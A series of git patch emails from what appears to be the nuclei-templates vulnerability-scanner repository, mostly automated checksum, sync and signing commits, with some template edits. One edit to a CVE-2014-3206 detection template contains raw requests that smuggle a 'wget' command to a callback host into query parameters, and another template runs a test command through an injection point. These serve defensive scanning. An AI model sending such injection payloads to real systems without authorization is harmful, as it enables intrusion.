templates-checksum.txt | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d1c703ef35..864cff7685 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0058f7deab6259dbd38b4404ee74975e45bc4f75 -cves.json-checksum.txt:c9eed153337837c2ce6b2ce89bb9bd59d39758a9 +cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76 +cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3010,7 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 -http/cves/2023/CVE-2023-29827.yaml:d6b8d8dd39ad77d513e00403c358db3dbb4ce073 +http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 @@ -3166,7 +3166,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 -http/cves/2023/CVE-2023-44813.yaml:799d537f93a6a047dd34ac0c099fee60ec58fdab +http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 @@ -3820,6 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8 +http/exposed-panels/fortinet/f5-next-central-manager.yaml:d762378ab72ddb5aa7d2efdcf5a81c9a04b5eddf http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823 http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8 http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff @@ -6633,6 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71 http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564 http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db +http/technologies/boa-web-server.yaml:e35a4938390a7c71865787c3fad9ad85cdd34d89 http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83 http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31 @@ -8536,7 +8538,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fc5915d967b1a21dcfd5a6b1d76d4dd1d5a43871 +templates-checksum.txt:4c32ab29cb43609d0ff62d6902740a916ef16476 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4486608a7812a6164d6de2db7309351f07e2f3d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:17 +0000 Subject: [PATCH 1076/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 353817cd75..49cfe18ccc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' + - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' From 9dfe9ed11163b09a6a26f4cde13748e5110ee0a6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:49 +0000 Subject: [PATCH 1077/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 49cfe18ccc..f728a27435 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -34,6 +34,7 @@ on: - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' + - 'http/technologies/boa-web-server.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/statamic-detect.yaml' From 611a91dd162f1e670baa609fb4681d8d0deface4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:12:15 +0000 Subject: [PATCH 1078/1768] Auto Template Signing [Wed May 15 08:12:15 UTC 2024] :robot: --- http/exposed-panels/fortinet/f5-next-central-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 02873fe6ad..85944c6335 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100b3c8cbebbf5b6db93eb84a58ba8a629736bd27b2715e4e907afe8d4c16ffe808022100efb3278f5f84739a8835ab53f02255849df148e45d16593a8cf6655c65b51ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d866333971b1434edce371df793c3d87fd6e2e1c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:42:32 +0530 Subject: [PATCH 1079/1768] Update castel-digital-sqli.yaml --- http/vulnerabilities/other/castel-digital-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index 222857b3da..b29c982920 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -27,11 +27,11 @@ http: - | GET /restrito/ HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body_2 words: - "Banner" - "Construtoras" From ccead404f83465b5fcdee9d86afae67c0c17168b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:15:50 +0000 Subject: [PATCH 1080/1768] Auto Generated New Template Addition List [Wed May 15 08:15:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 119242db54..903417746e 100644 --- a/.new-additions +++ b/.new-additions @@ -36,4 +36,5 @@ http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +http/vulnerabilities/other/castel-digital-sqli.yaml javascript/enumeration/checkpoint-firewall-enum.yaml From 9b7b7d0f2ad22a607e00be0a40aff88b4e6cd2cf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:16:00 +0000 Subject: [PATCH 1081/1768] Auto Generated Templates Checksum [Wed May 15 08:16:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 864cff7685..093de95984 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3820,7 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8 -http/exposed-panels/fortinet/f5-next-central-manager.yaml:d762378ab72ddb5aa7d2efdcf5a81c9a04b5eddf +http/exposed-panels/fortinet/f5-next-central-manager.yaml:88b7c61b91dcb46cb80694570e9f6dc214b91f08 http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823 http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8 http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff @@ -7651,6 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50 http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e +http/vulnerabilities/other/castel-digital-sqli.yaml:a7cf8f337e5bc23c47872d74f16cebaf7f83fb39 http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 @@ -8538,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4c32ab29cb43609d0ff62d6902740a916ef16476 +templates-checksum.txt:29023639b8d641762d7f4bd14ce9aaae7228d6fd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 46a318af2aa0dd3401da168143fb9e3d6b7815d5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:16:39 +0000 Subject: [PATCH 1082/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f728a27435..6900fcf26b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' + - 'http/vulnerabilities/other/castel-digital-sqli.yaml' - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: From 71fb6cee7078de6af3e14b066050ab16074d5a5b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:17:42 +0000 Subject: [PATCH 1083/1768] Auto Template Signing [Wed May 15 08:17:42 UTC 2024] :robot: --- http/technologies/boa-web-server.yaml | 1 + http/vulnerabilities/other/castel-digital-sqli.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index 109d3bcf30..53c893383c 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -35,3 +35,4 @@ http: part: header kval: - Server +# digest: 4a0a0047304502202169ec1f1b72425327554db7f1a270b4560a3e56b3f12e0cde1f693f8031958702210083f4edf96fefff0f4aaa15cc8b8070c70f6d8fe222ecb2b68da0734125597713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index b29c982920..53a9a6176f 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d80a22d4cf273f6271529eb7a45f6340388cc7b72da5125e620e24e141c66ac4022100dab34630a0cb5708cd7153359df8c7bbe5b45c9c7ee7cb0f076e31a29b76023d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b9a8d3901eecd0bcb8b0119ee94a0dab9b050857 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 15 May 2024 20:48:11 +0530 Subject: [PATCH 1084/1768] misc update --- http/cves/2014/CVE-2014-3206.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 17c94b7d1a..a84e26cb6c 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -12,7 +12,6 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 - - https://www.exploit-db.com/exploits/33159/ - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -31,15 +30,14 @@ info: http: - raw: - | - GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - | - GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - unsafe: true matchers: - type: word part: interactsh_protocol From f2e4bc8d32ac25e2abe8f1c6858b1793183aba89 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 15:18:47 +0000 Subject: [PATCH 1086/1768] Auto Generated Templates Checksum [Wed May 15 15:18:47 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 093de95984..6077852c47 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1117,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee -http/cves/2014/CVE-2014-3206.yaml:5bcd720008ba2297db841385a8f54f07215edf17 +http/cves/2014/CVE-2014-3206.yaml:10b81c432a045166afa4da6978731d3b115102f7 http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e @@ -6634,7 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71 http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564 http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db -http/technologies/boa-web-server.yaml:e35a4938390a7c71865787c3fad9ad85cdd34d89 +http/technologies/boa-web-server.yaml:f0f198ec1d26c859c0727b2b72fb8f4ed399a803 http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83 http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31 @@ -7651,7 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50 http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e -http/vulnerabilities/other/castel-digital-sqli.yaml:a7cf8f337e5bc23c47872d74f16cebaf7f83fb39 +http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29023639b8d641762d7f4bd14ce9aaae7228d6fd +templates-checksum.txt:29fad74529fa11c3c7395ce26d2cae41e760637d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a1d26d95828e409054b1f0af93fe678cb1b6e826 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 15:20:31 +0000 Subject: [PATCH 1087/1768] Auto Template Signing [Wed May 15 15:20:31 UTC 2024] :robot: --- http/cves/2014/CVE-2014-3206.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index a84e26cb6c..1eef11da3d 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ef5075f2e6573b3692beaf6f3602fe57a4c653f6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Wed, 15 May 2024 19:31:44 +0200 Subject: [PATCH 1088/1768] Add files via upload --- .../oracle-ebusiness-suite-panel.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/oracle-ebusiness-suite-panel.yaml diff --git a/http/exposed-panels/oracle-ebusiness-suite-panel.yaml b/http/exposed-panels/oracle-ebusiness-suite-panel.yaml new file mode 100644 index 0000000000..12ae7d385b --- /dev/null +++ b/http/exposed-panels/oracle-ebusiness-suite-panel.yaml @@ -0,0 +1,37 @@ +id: oracle-ebusiness-suite-panel + +info: + name: Oracle E-Business Suite Login Panel - Detect + author: righettod + severity: info + description: | + Oracle E-Business Suite login panel was detected. + reference: + - https://www.oracle.com/applications/ebusiness/ + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Oracle UIX" + tags: panel,oracle,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/AppsLogin" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "/oa_html/oa.jsp", "oracle uix")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' \ No newline at end of file From 1d9e8529c37807c69052b7e7be8b1e76f25cb36b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 16 May 2024 02:06:32 +0530 Subject: [PATCH 1089/1768] Create trilium-notes-installer.yaml --- .../installer/trilium-notes-installer.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/misconfiguration/installer/trilium-notes-installer.yaml diff --git a/http/misconfiguration/installer/trilium-notes-installer.yaml b/http/misconfiguration/installer/trilium-notes-installer.yaml new file mode 100644 index 0000000000..df2153bb7c --- /dev/null +++ b/http/misconfiguration/installer/trilium-notes-installer.yaml @@ -0,0 +1,27 @@ +id: trilium-notes-installer + +info: + name: Trilium Notes Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Detects if the Trilium Notes setup page is accessible. + metadata: + shodan-query: html:"Trilium Notes" + tags: trilium,setup,misconfig,installer + +http: + - method: GET + path: + - "{{BaseURL}}/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Trilium Notes setup" + + - type: status + status: + - 200 From 79a126c4605347aad4a24b10db579055c7afe482 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 16 May 2024 03:31:18 +0530 Subject: [PATCH 1090/1768] remove authenticated tag --- http/cves/2022/CVE-2022-33891.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 0e8cd9ebfd..8ee883ede9 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: spark shodan-query: title:"Spark Master at" - tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm + tags: cve2022,cve,apache,spark,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" @@ -45,4 +45,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 From b5ffd641a5d7f977536296d2ede1b3c41ea0c8ae Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 04:07:24 +0000 Subject: [PATCH 1092/1768] Auto Generated Templates Checksum [Thu May 16 04:07:24 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6077852c47..7766f5a9c3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1117,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee -http/cves/2014/CVE-2014-3206.yaml:10b81c432a045166afa4da6978731d3b115102f7 +http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e @@ -2713,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823 http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703 -http/cves/2022/CVE-2022-33891.yaml:8f81f948758e19f4115f39eb1709b074d2dae3ff +http/cves/2022/CVE-2022-33891.yaml:7f018c89e7ae99be6d89f1fe0f774bf743a734dc http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6 http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29fad74529fa11c3c7395ce26d2cae41e760637d +templates-checksum.txt:42fdaf7e590824421c1c010924196a338fe81a1f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a0c375fad688e62c4af578a44e652858a12863f3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 04:09:05 +0000 Subject: [PATCH 1093/1768] Auto Template Signing [Thu May 16 04:09:05 UTC 2024] :robot: --- http/cves/2022/CVE-2022-33891.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 8ee883ede9..f24ba6dee7 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -45,4 